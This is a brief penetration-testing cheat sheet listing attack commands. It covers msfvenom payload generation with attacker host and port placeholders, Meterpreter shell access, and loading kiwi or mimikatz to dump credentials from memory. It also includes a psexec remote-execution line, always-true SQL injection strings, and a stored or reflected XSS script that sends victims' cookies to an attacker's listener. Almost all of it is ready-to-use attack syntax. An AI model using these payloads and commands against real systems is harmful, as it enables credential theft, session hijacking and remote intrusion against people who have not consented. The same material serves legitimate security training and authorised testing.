Metasploit
- Create standalone payload via MSFVenom (-f takes an output format, e.g. an executable format, not just an extension)
  - # msfvenom -p [payload] LHOST=[attack_machine] LPORT=[attack_port] -f [format] > [path_to_file+ext]
Meterpreter
- Invoke shell (-c channelizes the process I/O so it can be interacted with as a channel)
  - meterpreter > execute -f cmd.exe -c
  - meterpreter > channel -i [#]
- Load primary and extended functionality
  - meterpreter > load stdapi
  - meterpreter > load extapi
- Load Mimikatz or Kiwi (for dumping credentials in memory)
  - meterpreter > load kiwi
  - meterpreter > load mimikatz
- Launch executable
  - meterpreter > execute -f [program.exe] -c
PowerShell Empire
PSEXEC
- Launch PSEXEC against a remote target
  - C:\> psexec \\[targetIP] [-d] [-u user] [-p password] [command]
SQL Injection
- Testing for SQL Injection using always-TRUE statements
  - ' or 1=1
  - " or 1=1
  - ' or 'a'='a
  - ') or ('a'='a
Cross-Site Scripting (XSS)
- Reflected
- Stored
- DOM
- Using Netcat to grab cookies
  - Set up listener on attacker machine
  - Embed script on target site
    - <script>document.location='http://[your_address]:[port]/grab.cgi?'+document.cookie;</script>